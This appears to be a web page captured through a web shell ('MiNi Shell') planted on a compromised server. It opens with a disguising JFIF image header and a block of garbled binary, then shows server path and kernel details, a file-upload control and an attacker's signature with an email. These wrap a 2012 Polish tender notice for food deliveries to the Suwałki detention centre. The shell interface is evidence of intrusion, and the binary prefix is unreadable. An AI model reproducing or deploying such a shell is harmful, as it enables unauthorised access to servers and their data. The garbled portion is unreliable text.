JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120928/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120928/370770-N-2012.html

<p class="kh_header"><b>Suwałki: Przedmiotem zamówienia są dostawy różnych artykułów spożywczych do Aresztu Śledczego w Suwałkach - postępowanie numer 13/Ż/2012</b><br>
<b>Numer ogłoszenia: 370770 - 2012; data zamieszczenia: 28.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy w Suwałkach , ul. Wojska Polskiego 29, 16-400 Suwałki, woj. podlaskie, tel. 087 5651207, faks 087 5650328.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia są dostawy różnych artykułów spożywczych do Aresztu Śledczego w Suwałkach - postępowanie numer 13/Ż/2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> . Przedmiot zamówienia obejmuje dostawę następujących artykułów:

Część I - przyprawy i przetwory 

1)	Sól jodowana( CPV 15872400-5) opakowanie jedn. max. 1 kg - 1 820,00 kg,
2)	Kawa zbożowa ( CPV 15861000-5) opakowanie jedn. max. 1 kg -730,00 kg,
3)	Herbata granulowana ( CPV 15863000-5) opakowanie jedn. max. 100 g - 150,00 kg,
4)	Ketchup ( CPV 15871230-5) opakowanie jedn. max. 5 kg - 430,00 kg,
5)	Przyprawa do zup w płynie ( CPV 15871270-7) opakowanie jedn. max. 1 l - 470,00 l,
6)	Przyprawa jarzynka w proszku ( CPV 15871270-7) opakowanie jedn. max. 1 kg - 560,00 kg 
7)	Koper nać suszona ( CPV 15893000-4) opakowanie jedn. max. 25 g - 38,00 kg,
8)	Pietruszka nać suszona (CPV 15893000-4) opakowanie jedn. max. 25 g - 24,00 kg, 
9)	Czosnek mielony ( CPV 15872200-3) opakowanie jedn. max. 25 g - 27,00 kg,
10)	Liść laurowy ( CPV 15872200-3) opakowanie jedn. max. 10 g - 38,00 kg,
11)	Majeranek ( CPV 15872200-3) opakowanie jedn. max. 10 g - 74,00 kg,
12)	Papryka mielona słodka ( CPV 15872200-3) opakowanie jedn. Max. 25 g - 47,00 kg,
13)	Pieprz czarny mielony ( CPV 15872200-3) opakowanie jedn. max. 25 g - 37,00 kg,
14)	Pieprz ziołowy ( CPV 15872200-3) opakowanie jedn. max. 25 g - 56,00 kg,
15)	Ziele angielskie( CPV 15872200-3) opakowanie jedn. max. 15 g - 38,00 kg,
16)	Kwasek cytrynowy ( CPV 1580000-5) opakowanie jedn. max. 25 g - 23,00 kg,
17)	Ocet ( CPV 15871120-1) opakowanie jedn. max. 0,5 l - 110,00  l,
18)	Majonez ( CPV 15871279-8) opakowanie jedn. max. 5 kg - 220,00 kg,
19)	Przyprawa do kurczaka ( CPV 15871270-7) opakowanie jedn. max. 1 kg - 47,00 kg,
20)	Przyprawa do bigosu ( CPV 15871270-7) opakowanie jedn. max. 1 kg - 31,00 kg,
21)	Musztarda (CPV 15871250) - opakowanie jednostkowe max. 5 kg.  -320,00 kg,
22)	Chrzan tarty  (CPV 1533110-1) - opakowanie jednostkowe max. 5 kg - 350,00 kg,
23)	Szczaw konserwowy cięty, (CPV 15331480-5) opak. jedn. max. 1 kg - 910,00 kg,
24)	Włoszczyzna suszona (CPV 15331110-1) opak. jedn. max. 1 kg - 310,00 kg
25)	Koncentrat pomidorowy (CPV 15331426-6) opak. jedn. max. 1 kg - 1 750,00 kg,
26)	Cynamon (CPV 15870000-7) opak. jedn. maks. 15 g - 5,00 kg,
27)	Zioła prowansalskie (CPV 15872000-1) - opak. Jedn. Maks. 25 g - 10,00 kg,
28)	Syrop owocowy - (CPV 15321800-2) - opak. Jedn. 10 l - 500,00 l,
29)	Zupa pieczarkowa w proszku - (CPV 15891000-0) - opak. jedn. maks. 5 kg - 700,00 kg,
30)	Zupa ogonowa w proszku- (CPV 15891000-0) - opak. jedn. maks. 5 kg - 600,00 kg,
31)	Zupa rosół drobiowy w proszku- (CPV 15891000-0) - opak. jedn. maks. 5 kg -400,00 kg,
32)	Żurek w proszku- (CPV 15891000-0) - opak. jedn. maks. 5 kg - 400,00 kg,



Część II- Leczo warzywne
1.	Leczo warzywne (CPV 15894000) opak. jedn. max. 10 kg - 2000,00 kg;

3.2.	W/w artykuły muszą odpowiadać Polskiej Normie.
3.3.	Wszystkie w/w produkty muszą spełniać normy, co do jakości, jakie wynikają z obowiązujących przepisów polskiego prawa dla produktów żywnościowych.
3.4.	Podane ilości są szacunkowe (maksymalne) i w czasie obowiązywania umowy mogą ulec zmianie.
3.5.	Wykonawcy będzie przysługiwało prawo do wynagrodzenia za faktycznie dostarczone ilości towaru.
3.6.	Z tytułu zmniejszenia wielkości zamówienia Wykonawcy nie będą przysługiwały żadne roszczenia finansowe ani prawne. 
3.7.	Wymagania i warunki realizacji zamówienia stawiane Wykonawcy:

3.7.1.	Miejsce realizacji zamówienia: magazyn Aresztu Śledczego w Suwałkach. 

3.7.2.	Transport towaru odbywać się będzie na koszt i ryzyko wykonawcy.
3.7.3.	Dostawy będą częściowe i sukcesywne. Ilość i rodzaj zamawianego towaru zamawiający określał będzie każdorazowo telefonicznie bądź faxem do godziny 900  na dwa dni przed dostawą.
3.7.4.	Dostawa towaru odbywać się będzie codziennie do godz. 1100 z wyłączeniem sobót, niedziel i świąt.
3.7.5.	Zamawiający dokonywał będzie odbioru jakościowego i ilościowego dostarczanego towaru w swojej siedzibie, w dniu dostawy każdej partii.
3.7.6.	Wymagana jest należyta staranność przy realizacji zobowiązań umowy.
3.7.7.	Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez zamawiającego z ustanowionym przedstawicielem wykonawcy. 
3.7.8.	Określenie przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia.
3.7.9.	Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.33.00.00-0, 15.87.00.00-7, 15.89.10.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Areszt Śledczy, ul.Wojska Polskiego 29, 16-400 Suwałki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.10.2012 godzina 10:00, miejsce: Areszt Śledczy, ul.Wojska Polskiego 29, 16-400 Suwałki, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I - przyprawy i przetwory.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Sól jodowana( CPV 15872400-5) opakowanie jedn. max. 1 kg - 1 820,00 kg,
2)	Kawa zbożowa ( CPV 15861000-5) opakowanie jedn. max. 1 kg -730,00 kg,
3)	Herbata granulowana ( CPV 15863000-5) opakowanie jedn. max. 100 g - 150,00 kg,
4)	Ketchup ( CPV 15871230-5) opakowanie jedn. max. 5 kg - 430,00 kg,
5)	Przyprawa do zup w płynie ( CPV 15871270-7) opakowanie jedn. max. 1 l - 470,00 l,
6)	Przyprawa jarzynka w proszku ( CPV 15871270-7) opakowanie jedn. max. 1 kg - 560,00 kg 
7)	Koper nać suszona ( CPV 15893000-4) opakowanie jedn. max. 25 g - 38,00 kg,
8)	Pietruszka nać suszona (CPV 15893000-4) opakowanie jedn. max. 25 g - 24,00 kg, 
9)	Czosnek mielony ( CPV 15872200-3) opakowanie jedn. max. 25 g - 27,00 kg,
10)	Liść laurowy ( CPV 15872200-3) opakowanie jedn. max. 10 g - 38,00 kg,
11)	Majeranek ( CPV 15872200-3) opakowanie jedn. max. 10 g - 74,00 kg,
12)	Papryka mielona słodka ( CPV 15872200-3) opakowanie jedn. Max. 25 g - 47,00 kg,
13)	Pieprz czarny mielony ( CPV 15872200-3) opakowanie jedn. max. 25 g - 37,00 kg,
14)	Pieprz ziołowy ( CPV 15872200-3) opakowanie jedn. max. 25 g - 56,00 kg,
15)	Ziele angielskie( CPV 15872200-3) opakowanie jedn. max. 15 g - 38,00 kg,
16)	Kwasek cytrynowy ( CPV 1580000-5) opakowanie jedn. max. 25 g - 23,00 kg,
17)	Ocet ( CPV 15871120-1) opakowanie jedn. max. 0,5 l - 110,00  l,
18)	Majonez ( CPV 15871279-8) opakowanie jedn. max. 5 kg - 220,00 kg,
19)	Przyprawa do kurczaka ( CPV 15871270-7) opakowanie jedn. max. 1 kg - 47,00 kg,
20)	Przyprawa do bigosu ( CPV 15871270-7) opakowanie jedn. max. 1 kg - 31,00 kg,
21)	Musztarda (CPV 15871250) - opakowanie jednostkowe max. 5 kg.  -320,00 kg,
22)	Chrzan tarty  (CPV 1533110-1) - opakowanie jednostkowe max. 5 kg - 350,00 kg,
23)	Szczaw konserwowy cięty, (CPV 15331480-5) opak. jedn. max. 1 kg - 910,00 kg,
24)	Włoszczyzna suszona (CPV 15331110-1) opak. jedn. max. 1 kg - 310,00 kg
25)	Koncentrat pomidorowy (CPV 15331426-6) opak. jedn. max. 1 kg - 1 750,00 kg,
26)	Cynamon (CPV 15870000-7) opak. jedn. maks. 15 g - 5,00 kg,
27)	Zioła prowansalskie (CPV 15872000-1) - opak. Jedn. Maks. 25 g - 10,00 kg,
28)	Syrop owocowy - (CPV 15321800-2) - opak. Jedn. 10 l - 500,00 l,
29)	Zupa pieczarkowa w proszku - (CPV 15891000-0) - opak. jedn. maks. 5 kg - 700,00 kg,
30)	Zupa ogonowa w proszku- (CPV 15891000-0) - opak. jedn. maks. 5 kg - 600,00 kg,
31)	Zupa rosół drobiowy w proszku- (CPV 15891000-0) - opak. jedn. maks. 5 kg -400,00 kg,
32)	Żurek w proszku- (CPV 15891000-0) - opak. jedn. maks. 5 kg - 400,00 kg,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.00.00-0, 15.87.00.00-7, 15.89.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II- Leczo warzywne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Leczo warzywne (CPV 15894000) opak. jedn. max. 10 kg - 2000,00 kg;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.40.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com